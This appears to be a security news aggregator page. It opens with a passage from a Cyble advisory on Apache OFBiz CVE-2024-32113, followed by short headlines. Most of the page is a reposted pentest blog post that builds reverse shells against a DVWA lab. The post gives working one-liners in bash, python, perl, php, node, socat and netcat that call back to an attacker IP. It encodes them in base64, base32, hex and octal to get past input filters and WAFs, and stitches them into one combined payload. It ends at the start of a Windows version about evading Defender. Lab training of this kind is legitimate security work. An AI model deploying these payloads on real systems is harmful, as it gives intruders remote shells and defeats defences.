unexpected URI requests, the logic for retrieving the authenticated view map can become confused, granting the attacker unauthorized access. Exploitation occurs when an attacker submits a crafted request to the endpoint /webtools/control/forgotPassword;/ProgramExport, embedding a payload that executes Groovy scripts. This enables arbitrary commands to be run on the server. For instance, a payload could be used to execute the id command, which returns user and group IDs, thereby revealing sensitive information about the server environment. Figure 2 - Executing Commands with Payload Mitigation CVE-2024-32113 affects Apache OFBiz versions prior to 18.12.13. However, version 18.12.13 remains vulnerable to CVE-2024-45195. Therefore, users are advised to upgrade to the latest version, 18.12.16, which addresses both vulnerabilities. Recommendations Following are recommendations to defend against the exploitation of CVE-2024-32113 and related vulnerabilities: Upgrade Apache OFBiz to version 18.12.16 or the latest version available. This version addresses both CVE-2024-32113 and CVE-2024-45195. Configure and deploy a WAF to filter and monitor HTTP requests, blocking attempts that exploit path traversal and other known attack vectors. Apply the principle of least privilege to limit the potential impact of any successful exploitation. Regularly review logs for unusual activities, such as unauthorized access attempts or suspicious requests to vulnerable endpoints. Indicators of Compromise Indicators  IndicatorType Description 185[.]190[.]24[.]111 IPv4 Malicious IP References https://nvd.nist.gov/vuln/detail/CVE-2024-32113 https://nvd.nist.gov/vuln/detail/CVE-2024-45195 https://thehackernews.com/2024/09/apache-ofbiz-update-fixes-high-severity.html https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/ https://isc.sans.edu/diary/Increased+Activity+Against+Apache+OFBiz+CVE202432113/31132/ https://issues.apache.org/jira/browse/OFBIZ-13006 https://github.com//Mr-xn//CVE-2024-32113 The post The Re-Emergence of CVE-2024-32113: How CVE-2024-45195 has amplified Exploitation Risks appeared first on Cyble.

by CYBLE

SonicWall is urging customers affected by CVE-2024-40766 to ""please apply the patch as soon as possible.""

by ThreatDown

The personal intelligence system is scheduled to roll out next month for the iPhone, iPad and Mac.

by ITPro Today

Scammers are now throwing in the name of the partner of the targeted victim, telling them that their partner is cheating on them.

by Malwarebytes Labs

by KnowBe4

After reading about the recent cybersecurity research by Richard Fang, Rohan Bindu, Akul Gupta and Daniel Kang, I had questions. While initially impressed that ChatGPT 4 can exploit the vast majority of one-day vulnerabilities, I started thinking about what the results really mean in the grand scheme of cybersecurity. Most importantly, I wondered how a […] The post ChatGPT 4 can exploit 87% of one-day vulnerabilities: Is it really that impressive? appeared first on Security Intelligence.

by Security Intelligence

The 2024 Trustwave Risk Radar Report: Financial Services Sector underscores the escalating threat landscape facing the industry.

by SpiderLabs Blog

The surge of tech sector layoffs in the last two years could have ripple effects across the economy and investment market, according to RBC Capital Markets.

by ITPro Today

In July 2024, KnowBe4 revealed that we had unknowingly hired a North Korean who was pretending to be someone else. We locked down the laptop that was sent to the fake employee within 25 minutes of receiving an alert that he was trying to do something suspicious, and at no time did the North Korean have access to customer data or systems.

by KnowBe4

EU''s highest court backs a $14.4 billion tax bill for Apple; Google''s penalty for abusing its dominance is also upheld.

by ITPro Today

Oracle''s cloud infrastructure growth, driven by AI demand, positions the company for greater investor confidence and market value, despite its underdog status among cloud providers.

by ITPro Today

Researchers flagged a pair of Gallup site XSS vulnerabilities.

by Dark Reading

In this comprehensive overview, you will discover how object storage improves data management, boosts efficiency, and fits in the evolving cloud landscape.

by ITPro Today

Chinese cyberespionage campaign renews efforts in multiple organizations in Southeast Asia, blending tactics and expanding efforts

by Sophos News

Repellent Scorpius distributes Cicada3301 ransomware, using double extortion and targeting global victims since May 2024. We break down their toolset and more. The post Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware appeared first on Unit 42.

by Palo Alto Networks - Unit42

A PRC threat cluster known as "Crimson Palace" is demonstrating the benefits of having specialized units carry out distinct stages of a wider attack chain.

by Dark Reading

SummaryThis blog describes some techniques for generating encoded Linux reverse shell payload (I also have a similar article for Windows). Sometimes, the default (plaintext) payload may not work due to input filtering or the selected binary (e.g. netcat) not being available on the target system. To overcome these problems, I will show some different techniques how to encode the payload. Also, I will present you a technique where you can use multiple payloads as one-liner. I will demonstrate this using the Damn Vulnerable Web Application (DVWA) Command Injection challenge with the security level set to Medium and High. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.Source: https://www.amazon.com/HackSwagCo-Reverse-Shell-T-Shirt/DisclaimerThis article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.Why this blog?There is a lot of online information about different payloads that can be used to set up a reverse shell. The most notable is the online reverse shell generator (https://www.revshells.com/). This site is really fantastic, it allows you to dynamically generate reverse shell code for Linux, Windows, or MacOS in a variety of languages ​​including Bash, Python, Powershell, etc.However, of all the reverse shells in www.revshells.com, only a single one (socat) worked with our implementation Damn Vulnerable Web Application command injection lab (security level was set to “high”). When the security level is set to “high”, the web server performs extensive input validation, filtering out many characters that are required in the code to spawn a reverse shell. Additionally, our target web server (DVWA Linux Docker image) does not ship with many binaries. Although, our lab in our lab scenario we do access to socat, can not always should rely on this.In the first part, I will show you some encoding techniques to bypass application firewall filtering. Next, we will create a list of multiple reverse shells and encode them all together into a “master” copy-pastable.Lab environmentThis POC consists of 2 machines: an attacker machine (Kali Linux, 192.168.62.187) and a vulnerable Linux web server (DVWA Docker image 192.168.62.177).Kali 64-bit [Version 24.2]IP-Address: 192.168.62.187DVWA LinuxIP-Address: 192.168.62.177Docker image https://hub.docker.com/r/vulnerables/web-dvwaPart 1: Encoding techniques Bash reverse shell on DVWA Linux (Security level=Medium and High)Note: it’s possible to skip part 1 and directy start with part 2 (steps 8 till 15)This article is not about the details of exploiting command injection. You can find more information my other Medium article: https://medium.com/system-weakness/the-ultimate-pen-tester-guide-to-command-injection-d29fac2f4c3b. We will only use the DVWA command injection vulnerability for illustration purposes. You are allowed use an other way to execute the code snippets in this blog post.Attack context:· Target OS: Linux· DVWA Security level: Medium and High· Vulnerable web site: http://192.168.62.177/vulnerabilities/exec/Let’s start with confirming we have our command injection vulnerability when the DVWA Security level is set to “Medium”1. Performed against vulnerable web server, Linux DVWA (Medium security).Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated Chromium browser). If not done yet, set the DVWA security level to ‘medium’. Browse to the DVWA Command Injection site (http://192.168.62.177/vulnerabilities/exec/). Perform the ’ping a device’ function on the loopback address or localhost.The TTL value (64) tells us it’s a Linux web server, and we can also see that this ping function sent four ICMP packets. The payload is not reflected in the URL, so we are dealing with a POST request.Next, we will use the pipe character ‘|’ to trigger the command injection vulnerability. Execute the following command:127.0.0.1|ls -lAs you can see in the screenshot above, the second “ls -l”command is executed. This means we triggered the command injection vulnerability.Next, we will use the command injection vulnerability to setup a reverse shell using Bash.Why Bash?The answer is simple: the “Bourne Again Shell” is the default shell on most Linux-based Operating Systems. You have about 99% chance that your Linux target is shipped with /bin/bash.In the next sections, we will setup the following Bash reverse shells:Plaintext Bash (DVWA medium)Base64 encoded Bash (DVWA medium)Base32 encoded Bash (DVWA medium)Hexadecimal encoded Bash (DVWA medium)Octal encoded Bash (DVWA high)In the last section, we will combine multiple reverse shells:Base64 encoded multiple languages (DVWA medium)Octal encoded multiple languages (DVWA medium)PlaintextThe plaintext Bash payload is straight forward. This payload works up to the DVWA security level Medium.2. Performed on Kali Linux.Set up a netcat listener.nc -nlvp 4433. Performed on Kali Linux.Create plaintext Bash reverse shell payload for your situation. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=192.168.62.187port=443echo """echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\"|bash"""Our result is the following string:echo "bash -i >& /dev/tcp/192.168.62.187/443 0>&1"|bash4. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).Add the plaintext Bash payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo "bash -i >& /dev/tcp/192.168.62.187/443 0>&1"|bashCheck out the netcat terminal:Stop and restart the netcat listener.In the next section, we will use different encoding techniques for the basic Bash reverse shell.Base64 encodingYou may already be familiar with the base64 encoding technique. It converts every 3 bytes into 4 bytes ASCII format. The advantage is that the payload remains relatively short and special characters are neutralized. The base64 binary is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/) and is present in almost all Linux distributions. The disadvantage of base64 is the use of the “+” character. In a URL (GET request), the ‘+’ is seen as a space and must be additionally encoded to %2B.The base64 encode payload works up to the DVWA security level Medium.5. Performed on Kali Linux.Create base64 Bash reverse shell payload. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base64 -w 0Our result is the following string:ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNoWe will use this string in step 6.Note: As mentioned earlier, base64 payloads can contain the “+” character. This breaks the payload when you use it in an URL (GET request). In case of GET requests, the ‘+’ character must be encoded separately. You can use the following for this:attacker=192.168.62.187port=443echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base64 -w 0| sed -e ''s/+/%2B/g''6. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste Base64 code]|base64 -d|shOur statement to get a reverse shell:127.0.0.1|echo ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNo|base64 -d|shCheck out the netcat terminal:Stop and restart the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste Base64 code]|base64+-d|shBase32 encodingYou may have heard about the base32 encoding technique. This encoding scheme is less known than base64. It converts every 5 bytes into 8 bytes ASCII format. Just like base64, the base32 binary is part of the GNU Coreutils (https://www.gnu.org/software/coreutils/). The advantage of base32 over base64 is that it does not use the “+” character in the ASCII output. Secondly, because it is less well known, it is less likely that the string “base32” will be filtered by the web application firewall.7. Performed on Kali Linux.Create base32 Bash reverse shell payload. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | base32 -w 0Our result is the following string:MVRWQ3ZAEJRGC43IEAWWSIB6EYQC6ZDFOYXXIY3QF4YTSMROGE3DQLRWGIXDCOBXF42DIMZAGA7CMMJCEB6CAYTBONUA====We will use this string in step 8.8. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste Base32 code]|base32 -d|shOur statement to get a reverse shell:127.0.0.1|echo MVRWQ3ZAEJRGC43IEAWWSIB6EYQC6ZDFOYXXIY3QF4YTSMROGE3DQLRWGIXDCOBXF42DIMZAGA7CMMJCEB6CAYTBONUA====|base32 -d|shCheck out the netcat terminal:Stop and restart the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste Base32 code]|base32+-d|shHexadecimal encodingWith the xxd tool, plain text can be converted to hexadecimal characters. This technique works well, but it has some disadvantages:it is not certain that the xxd binary is on the targeteach byte is converted to hexadecimal and thus the payload becomes twice as large9. Performed on Kali Linux.Create hexadecimal Bash reverse shell payload. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | xxd --ps -c 1024Our result is the following string:6563686f202262617368202d69203e26202f6465762f7463702f3139322e3136382e36322e3138372f34343320303e263122207c2062617368We will use this string in step 10.10. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is (xxd double dash ps dash r):127.0.0.1|echo [paste hexadecimal string]|xxd — ps -r|shOur statement to get a reverse shell:127.0.0.1|echo 6563686f202262617368202d69203e26202f6465762f7463702f3139322e3136382e36322e3138372f34343320303e263122207c2062617368|xxd --ps -r|shCheck out the netcat terminal:Nothing happened! Unfortunately, our implementation of the DVWA did not ship with the xxd binary.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste hexadecimal string]|xxd+ — ps+-r|shOctal encodingNow we come to my favorite encoding/decoding technique: octal (also known as base 8). This is the only technique in which it has been possible to set up a reverse shell with DVWA high security level set to high. With the printf utility, it is possible to print octal numbers as ASCII characters. For example, printf ‘\150\145\154\154\157\40\167\157\162\154\144\12’ becomes ‘hello world’.This technique has several advantages:printf comes with GNU coreutils and is almost always present on Linux targetsthis is a relatively unknown technique and there is a much smaller chance that otcal strings will be detected by Web Application Firewallsyou are allowed to only encode ‘key characters’ (see part 2 for demonstration)A disadvantage is that the payload can become quite big. About 3 times bigger than the original plaintext payload, but you can choose to only encode ‘key characters’.You can find octal encoded PHP web shell payload in my article https://medium.com/@minix9800/command-injection-to-web-shell-in-dvwa-high-security-level-on-linux-97c909c220c911. Performed on Kali Linux.Create octal Bash reverse shell payload. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443echo -n "echo \"bash -i >& /dev/tcp/${attacker}/${port} 0>&1\" | bash" | od -b -An -w9999|sed ''s! !\\!g''| sed ''s!\\[0]!\\!g''Our result is the following string:\145\143\150\157\40\42\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\66\62\56\61\70\67\57\64\64\63\40\60\76\46\61\42\40\174\40\142\141\163\150We will use this string in step 12.12. Performed against vulnerable web server, Linux DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|printf ''[octal sting]''|shOur statement to get a reverse shell:printf ''\145\143\150\157\40\42\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\66\62\56\61\70\67\57\64\64\63\40\60\76\46\61\42\40\174\40\142\141\163\150''|shCheck out the netcat terminal:Stop and restart the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|printf+''[octal sting]''|shPart 2: Concatenate multiple reverse shellsMaybe about 99% of all Linux distros are shipped with Bash. However, you may encounter a “no Bash” system in a CtF competition or in an exam. In the next section, I will show you how to use the encoding techniques with multiple reverse shells.13. Performed on Kali Linux.Create a text file including multiple reverse shell one-liners. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443cat << EOF > /tmp/shells_linux.txtecho "bash -i >& /dev/tcp/${attacker}/${port} 0>&1" | bash;python -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${attacker}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${attacker}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''perl -e ''use Socket;\$i="${attacker}";\$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};''socat exec:''sh'',pty,stderr,setsid,sigint,sane tcp:${attacker}:${port};nc -nv ${attacker} ${port} -e /bin/sh;echo "bash -i rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ${attacker} ${port} > /tmp/f" | bash;php -r ''\$sock=fsockopen("${attacker}",${port});exec("/bin/sh -i <&3 >&3 2>&3");''php -r ''\$sock=fsockopen("${attacker}",${port});shell_exec("/bin/sh -i <&3 >&3 2>&3");''echo "(function(){var net = require(''net''),cp = require(''child_process''),sh = cp.spawn(''sh'', []);var client = new net.Socket();client.connect(${port}, ''${attacker}'', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents" >/tmp/node_shell.jsecho ''})();'' >>/tmp/node_shell.js; node /tmp/node_shell.jsEOFThe size of the /tmp/shells_linux.txt file is about 1480 bytes. In the next step we will encode this file to our needs.14. Performed on Kali Linux.Create different encoded representations of the text file from step 13. Open a Bash terminal use copy and paste the following code:Base64cat /tmp/shells_linux.txt| base64 -w 0Base32cat /tmp/shells_linux.txt| base32 -w 0Hexadecimalcat /tmp/shells_linux.txt| xxd --ps -c 1024Octalcat /tmp/shells_linux.txt| od -b -An -w9999|sed ''s! !\\!g''| sed ''s!\\[0]!\\!g''Base64 encodingYou may haved noticed that the encoded payload is very large. The smallest (Base64) is 1976 bytes. We will continue with the next step only with Base64. I will show you how to reduce the octal payload size later.15. Performed against vulnerable web server, Linux DVWA (Security Level=Medium).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste Base64 code]|base64 -d|shOur statement to get a reverse shell:127.0.0.1|echo ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNoOwpweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxOTIuMTY4LjYyLjE4NyIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnCnB5dGhvbjMgLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxOTIuMTY4LjYyLjE4NyIsNDQzKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnCnBlcmwgLWUgJ3VzZSBTb2NrZXQ7JGk9IjE5Mi4xNjguNjIuMTg3IjskcD00NDM7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307Jwpzb2NhdCBleGVjOidzaCcscHR5LHN0ZGVycixzZXRzaWQsc2lnaW50LHNhbmUgdGNwOjE5Mi4xNjguNjIuMTg3OjQ0MzsKbmMgLW52IDE5Mi4xNjguNjIuMTg3IDQ0MyAtZSAvYmluL3NoOwplY2hvICJiYXNoIC1pIHJtIC1mIC90bXAvZjsgbWtmaWZvIC90bXAvZjsgY2F0IC90bXAvZiB8IC9iaW4vc2ggLWkgMj4mMSB8IG5jIDE5Mi4xNjguNjIuMTg3IDQ0MyA+IC90bXAvZiIgfCBiYXNoOwpwaHAgLXIgJyRzb2NrPWZzb2Nrb3BlbigiMTkyLjE2OC42Mi4xODciLDQ0Myk7ZXhlYygiL2Jpbi9zaCAtaSA8JjMgPiYzIDI+JjMiKTsnCnBocCAtciAnJHNvY2s9ZnNvY2tvcGVuKCIxOTIuMTY4LjYyLjE4NyIsNDQzKTtzaGVsbF9leGVjKCIvYmluL3NoIC1pIDwmMyA+JjMgMj4mMyIpOycKZWNobyAiKGZ1bmN0aW9uKCl7dmFyIG5ldCA9IHJlcXVpcmUoJ25ldCcpLGNwID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLHNoID0gY3Auc3Bhd24oJ3NoJywgW10pO3ZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpO2NsaWVudC5jb25uZWN0KDQ0MywgJzE5Mi4xNjguNjIuMTg3JywgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTtzaC5zdGRlcnIucGlwZShjbGllbnQpO30pO3JldHVybiAvYS87IC8vIFByZXZlbnRzIiA+L3RtcC9ub2RlX3NoZWxsLmpzCmVjaG8gJ30pKCk7JyA+Pi90bXAvbm9kZV9zaGVsbC5qczsgbm9kZSAvdG1wL25vZGVfc2hlbGwuanMK|base64 -d|shResult:We have a reverse shell based on /bin/bash. This is because Bash is our first shell in /tmp/shells_linux.txt. You can trigger the next reverse shell by starting another netcat listener (nc -nvlp 443) in a new terminal tab, than exit the current Bash reverse shell.You can see the next connection (perl) in terminal tab ‘netcat 2’.Stop and restart the netcat listener.The use of multiple reverse shells in combination with encoding causes the payload to become very large. The maximum URL length is 2048 characters. So, with a GET request we would only be able to use our base64 payload (1976 characters). We can significantly reduce the length of the payload by encoding only the “key characters”.16. Performed on Kali Linux.Generate a “hybrid” octal payload string where only the key characters are encoded.. Open a Bash terminal use copy and paste the following code:attacker=192.168.62.187port=443echo -n "echo\40\42bash\40%.s\55i\76\46/dev/tcp/${attacker}/${port}\40%.s0\76\46%.s1\42\174bash\73\12"echo -n "netcat\40%.s${attacker}\40%.s${port}\40\55e\40\57bin\57sh\73\12"echo -n """python\40\55c\40\47import\40socket\54subprocess\54os\73s\75socket.socket\50socket.AF\137INET\54socket.SOCK_STREAM\51\73s.connect\50\50\42%.s${attacker}\42\54%.s${port}\51\51\73os.dup2\50s.fileno\50\51\54%.s0\51\73\40os.dup2\50s.fileno\50\51\54%.s1\51\73\40os.dup2\50s.fileno\50\51\54%.s2\51\73p\75subprocess.call\50\133\42\57bin\57sh\42\54\\4255i\42\135\51\73\47\73\12"""echo -n """php\40\55r\40\47\44sock\75fsockopen\50\42%.s${attacker}\42\54%.s${port}\51\73exec\50\42\57bin\57sh\40\55i\40\74\46%.s3\40\76\46%.s3\40%.s2\76\46%.s3\42\51\73\47\12"""echo -n """perl\40\55e\40\47use\40Socket\73\44i\75\42%.s${attacker}\42\73\44p\75%.s${port}\73socket\50S\54PF_INET\54SOCK_STREAM\54getprotobyname\50tcp\51\51\73if\50connect\50S\54sockaddr\137in\50\44p\54inet_aton\50\44i\51\51\51\51\173open\50STDIN\54\42\76\46S\42\51\73open\50STDOUT\54\42\76\46S\42\51\73open\50STDERR\54\42\76\46S\42\51\73exec\50\42\57bin\57sh\40\55i\42\51\73\175\73\47\12"""echo -n "echo\40\42\50function\50\51\173var\40net\75require\50\47net\47\51\54cp\75require\50\47child_process\47\51\54sh\75cp.spawn\50\47sh\47\54\40\133\135\51\73var\40client\75new net.Socket\50\51\73client.connect\50%.s${port}\54\47%.s${attacker}\47%.s\54function\50\51\173client.pipe\50sh.stdin\51\73sh.stdout.pipe\50client\51\73sh.stderr.pipe\50client\51\73\175\51\73return\40\57a\57\73\40\57\57\40Prevents\12\175\51\50\51\73\42\76\57tmp\57shell\137node.js\73node\40\57tmp\57shell\137node.js"We will use the string in the screenshot above in step 17.17. Performed against vulnerable web server, Linux DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|printf ''[octal sting]''|shOur statement to get a reverse shell:127.0.0.1|printf ''echo\40\42bash\40%.s\55i\76\46/dev/tcp/192.168.62.187/443\40%.s0\76\46%.s1\42\174bash\73\12netcat\40%.s192.168.62.187\40%.s443\40\55e\40\57bin\57sh\73\12python\40\55c\40\47import\40socket\54subprocess\54os\73s\75socket.socket\50socket.AF\137INET\54socket.SOCK_STREAM\51\73s.connect\50\50\42%.s192.168.62.187\42\54%.s443\51\51\73os.dup2\50s.fileno\50\51\54%.s0\51\73\40os.dup2\50s.fileno\50\51\54%.s1\51\73\40os.dup2\50s.fileno\50\51\54%.s2\51\73p\75subprocess.call\50\133\42\57bin\57sh\42\54\4255i\42\135\51\73\47\73\12php\40\55r\40\47\44sock\75fsockopen\50\42%.s192.168.62.187\42\54%.s443\51\73exec\50\42\57bin\57sh\40\55i\40\74\46%.s3\40\76\46%.s3\40%.s2\76\46%.s3\42\51\73\47\12perl\40\55e\40\47use\40Socket\73\44i\75\42%.s192.168.62.187\42\73\44p\75%.s443\73socket\50S\54PF_INET\54SOCK_STREAM\54getprotobyname\50tcp\51\51\73if\50connect\50S\54sockaddr\137in\50\44p\54inet_aton\50\44i\51\51\51\51\173open\50STDIN\54\42\76\46S\42\51\73open\50STDOUT\54\42\76\46S\42\51\73open\50STDERR\54\42\76\46S\42\51\73exec\50\42\57bin\57sh\40\55i\42\51\73\175\73\47\12echo\40\42\50function\50\51\173var\40net\75require\50\47net\47\51\54cp\75require\50\47child_process\47\51\54sh\75cp.spawn\50\47sh\47\54\40\133\135\51\73var\40client\75new net.Socket\50\51\73client.connect\50%.s443\54\47%.s192.168.62.187\47%.s\54function\50\51\173client.pipe\50sh.stdin\51\73sh.stdout.pipe\50client\51\73sh.stderr.pipe\50client\51\73\175\51\73return\40\57a\57\73\40\57\57\40Prevents\12\175\51\50\51\73\42\76\57tmp\57shell\137node.js\73node\40\57tmp\57shell\137node.js''|shWe have our reverse shell!I hope you found this interesting and can use this knowledge yourself during pentest assignments. In my next blog POST I will show you how you can use simular techiniques with Windows targets.Referenceshttps://hub.docker.com/r/vulnerables/web-dvwahttps://portswigger.net/web-security/os-command-injectionhttps://www.utf8-chartable.de/unicode-utf8-table.pl?utf8=octLinux reverse shell that (almost) always works. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

SummaryThis blog describes some techniques for generating encoded Windows reverse shell payload. (I also have a similar article for Linux). There are two main reasons why reverse shell payloads don’t work on Windows. First, the payload is typically considered malicious and blocked by Windows Defender. Second, the payload can’t get through the Web Application Firewall (WAF) because it contains suspicious strings. To overcome these issues, you need to combine two techniques:Use stealth payload that is streamed over the networkUse additional payload encodingIn this PoC, we are using a Windows 10 machine with Windows Defender and Windows Firewall enabled. We will simulate WAF with Damn Vulnerable Web Application (DVWA) with the security level set to high. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.Source: https://www.amazon.com/HackSwagCo-Reverse-Shell-T-Shirt/DisclaimerThis article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.Why this blog?There is a lot of online information about different payloads that can be used to set up a reverse shell. The most notable is the online reverse shell generator (https://www.revshells.com/). This site is really fantastic, it allows you to dynamically generate reverse shell code for Linux, Windows, or MacOS in a variety of languages ​​including Bash, Python, Powershell, etc.However, of all the Windows based reverse shells in www.revshells.com, not one them worked with our implementation Damn Vulnerable Web Application (DVWA on Xampp) command injection lab for which we set the security level to “high”. When the security level is set to “high”, the web server performs extensive input validation, filtering out many characters that are required in the code to spawn a reverse shell. Another key challenge is that we rely on a standard installation of Windows 10. This means that Windows Defender and Windows Firewall are functional and running.In the first sections, I will show you some encoding techniques to bypass application firewall filtering. In part 2, we will create a list of multiple reverse shells that are not detected by Windows Defender. We will encode them all together into a “master” copy-pastable.Lab environmentThis POC consists of machines: an attacker machine (Kali Linux, 172.16.78.251) and a vulnerable Windows web server (Windows 10, 172.16.78.243):Kali 64-bit [Version 24.2]IP-Address: 172.16.78.251DVWA Windows 10IP-Address: 172.16.78.243Xampp DVWA vulnerable web server (https://github.com/digininja/DVWA).Windows 10 Professional [Version 10.0.19045.4780]Windows Defender and Windows Firewall are turned onLast update was on Sunday September 8 2024.I will not explain how install a DVWA web server on Xampp. The following installation process walkthrough is available: https://www.linkedin.com/pulse/how-setup-dvwa-windows-10-using-xampp-shubham-yadav/.Part 1: Encoding techniques Powershell/Powercat reverse shell on DVWA Linux (Security level=High)Note: it’s possible to skip part 1 and directly start with part 2 (steps 8 till 15)This article is not about the details of exploiting command injection. You can find more information my other Medium article: https://medium.com/system-weakness/the-ultimate-pen-tester-guide-to-command-injection-d29fac2f4c3b. We will only use the DVWA command injection vulnerability for illustration purposes. You are allowed use an other way to execute the code snippets in this blog post.Attack context:· Target OS: Windows· DVWA Security level: High· Vulnerable web site: http://172.16.78.251/dvwa/vulnerabilities/exec/Let’s start with confirming we have our command injection vulnerability when the DVWA Security level is set to “Low”1. Performed against vulnerable web server, Windows DVWA.Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated browsers). If not done yet, set the DVWA security level to ‘low’. Browse to the DVWA Command Injection site (http://192.168.62.165/dvwa/vulnerabilities/exec/).Perform the ’ping a device’ function and ping the loopback address or localhost.The TTL value (128) tells us it’s a Windows web server. The payload is not reflected in the URL, so we also know that we are dealing with a POST request.Next, we will use the pipe character ‘|’ to trigger the command injection vulnerability. Execute the following command:127.0.0.1|dir /BAs you can see in the screenshot above, the second "dir /B" command is executed. This means 